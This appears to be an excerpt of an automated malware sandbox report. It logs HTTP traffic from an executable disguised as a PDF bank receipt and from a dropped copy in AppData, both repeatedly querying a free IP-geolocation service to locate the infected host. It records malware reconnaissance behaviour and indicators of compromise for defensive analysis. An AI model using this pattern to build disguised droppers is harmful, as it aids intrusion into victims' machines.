                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1461&min_rtt=1454&rtt_var=561&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1924851&cwnd=155&unsent_bytes=0&cid=f4ef5a4d55459b98&ts=184&x=0"
                                                                                                                                                        2025-01-16 06:02:03 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        1192.168.2.449735104.21.64.14437656C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2025-01-16 06:02:04 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        2025-01-16 06:02:04 UTC861INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:04 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Age: 2322113
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f0385%2Fq7HD8y7KS7hztkae94%2BMjGkOmiPIo1752MdpVjQotxl33rk2UN%2Bytn7ZKgZapCA6Oa62L3P%2B6dpAphs0XViY3WCzhXah2bZ%2BLn7LJIzkvv1vE%2BrkZbvJnzJgMt4qb7iYHZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 902be5037e0842e9-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1651&min_rtt=1643&rtt_var=632&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1709601&cwnd=241&unsent_bytes=0&cid=65ee8bd45c0d7cab&ts=148&x=0"
                                                                                                                                                        2025-01-16 06:02:04 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        2192.168.2.449739104.21.64.14437656C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2025-01-16 06:02:06 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2025-01-16 06:02:06 UTC863INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:06 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Age: 2322115
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jTqNjisUtllJkP%2B5e8wGRTMSjLiclmK0J5VVfjocc2%2BE9RPmBSieXc13k%2FV4HY0BWqEtq4bAmH%2BT9YdVRtUQ0%2B21l5mqpZ3UtVWsKuj%2FMDJXYHH07YoqdN%2Bia4fXNzOmnEKImTjO"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 902be50cdd8a7c6a-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1944&min_rtt=1940&rtt_var=736&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1478481&cwnd=218&unsent_bytes=0&cid=78371a0ed5427dd8&ts=157&x=0"
                                                                                                                                                        2025-01-16 06:02:06 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        3192.168.2.449742104.21.64.14437656C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2025-01-16 06:02:07 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        2025-01-16 06:02:07 UTC855INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:07 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Age: 2322116
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BSGpW6ZroE4btrHfWaQ%2BcX5YFJhiSoBIldBjvTwi7BYK2gwe7tQOg0zWXrfQYG5U9mJItP1wqVAcCnH9NEvx0sQdWKIS9SxR96YBgTXAj9LN8n2yShC55qpwiOZ74OBYC8U%2FIFxW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 902be515393042e9-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1714&min_rtt=1712&rtt_var=647&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1685912&cwnd=241&unsent_bytes=0&cid=c09254df3650b6f6&ts=147&x=0"
                                                                                                                                                        2025-01-16 06:02:07 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        4192.168.2.449743104.21.64.14438008C:\Users\user\AppData\Roaming\teXfNv.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2025-01-16 06:02:07 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2025-01-16 06:02:08 UTC861INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:07 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Age: 2322117
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PWXImCr56WVZ3M0vDk%2FqQaydHE52BRxombiVpWIM%2F26AxXOj3DNWcjO9Fzpq6sR5EoiudCR7mssgDMU39CWLQnOw%2FUzit5t1PF7ET%2BjRc7CxzVJqIIDAUa%2BoSLZOqhSiTI%2B1bcb8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 902be517dfc4de95-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1460&min_rtt=1457&rtt_var=553&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1968981&cwnd=246&unsent_bytes=0&cid=3edb954f7c688e49&ts=171&x=0"
                                                                                                                                                        2025-01-16 06:02:08 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        5192.168.2.449745104.21.64.14438008C:\Users\user\AppData\Roaming\teXfNv.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2025-01-16 06:02:08 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        2025-01-16 06:02:08 UTC863INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:08 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Age: 2322117
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7eHAxy3Y9Mtfg5%2FHmMRGrMNKaJ9jOoZIDh%2BD1%2ByyRgcPDSHhGoA4gZZD1xLg%2Bzn%2FrA8C6UUy5CzcgyMhF1w4%2BW628WqQTWtiIMyIOE6sXUPPzUybxlDb4H4yVxDcfQ8Wr%2FOFGN97"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 902be51cfdf442e9-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1617&min_rtt=1613&rtt_var=614&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1767554&cwnd=241&unsent_bytes=0&cid=7a6c13227862b579&ts=147&x=0"
                                                                                                                                                        2025-01-16 06:02:08 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        6192.168.2.449746104.21.64.14437656C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2025-01-16 06:02:08 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2025-01-16 06:02:08 UTC859INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:08 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Age: 2322117
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gYt%2BPozJg0sx42IB5E6cmflwE1VAweWi%2BfdjLyNtbFcmA1dMIBLP2wHe5ryceGgx9dT7%2B8EqxDwKxeam0W85pYNWwMTr5GlQtRniLFY5hWWvsNuP5%2FhUxCgAAk4I1mnmPw1ml%2F3O"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 902be51d4ed07c6a-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2015&min_rtt=2012&rtt_var=762&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1429270&cwnd=218&unsent_bytes=0&cid=8180c7f1997afbee&ts=138&x=0"
                                                                                                                                                        2025-01-16 06:02:08 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        7192.168.2.449749104.21.64.14438008C:\Users\user\AppData\Roaming\teXfNv.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2025-01-16 06:02:10 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        2025-01-16 06:02:10 UTC855INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:10 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Age: 2322119
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BacDyaHtl7wHQDngF6XqdN9W8wPU0q7O9LqQMEJRP2i1VXMXYIhbOkMrNnKfYjNgIknY1%2BnnPf94bCOmRrM3ML9VjpjswMAaZIQidn6NexyAH%2FPtEP0BX75Dv2jGYPO8wDzPizIo"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 902be5251c604414-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1677&min_rtt=1675&rtt_var=633&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1722713&cwnd=180&unsent_bytes=0&cid=a4cbabe4e0038693&ts=150&x=0"
                                                                                                                                                        2025-01-16 06:02:10 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        8192.168.2.449750104.21.64.14437656C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2025-01-16 06:02:10 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        2025-01-16 06:02:10 UTC857INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:10 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Age: 2322119
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EZpEYzMH9lXyE0XTNH2Vr4UkhRYdi4fVUt1zrCs%2F1hrIUplqTVCtnSVwv1GPdaRBm8hLCfphXtlB%2Fqy%2FlVjZpgDz28ctzEabaLiSlqccv%2F6enQow6RzhL2U1LqoH9LIZLuBnTn2l"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 902be5255b0542e9-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1686&min_rtt=1685&rtt_var=635&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1720683&cwnd=241&unsent_bytes=0&cid=bebb911ce314899f&ts=134&x=0"
                                                                                                                                                        2025-01-16 06:02:10 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        9192.168.2.449754104.21.64.14438008C:\Users\user\AppData\Roaming\teXfNv.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2025-01-16 06:02:11 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2025-01-16 06:02:11 UTC857INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:11 GMT
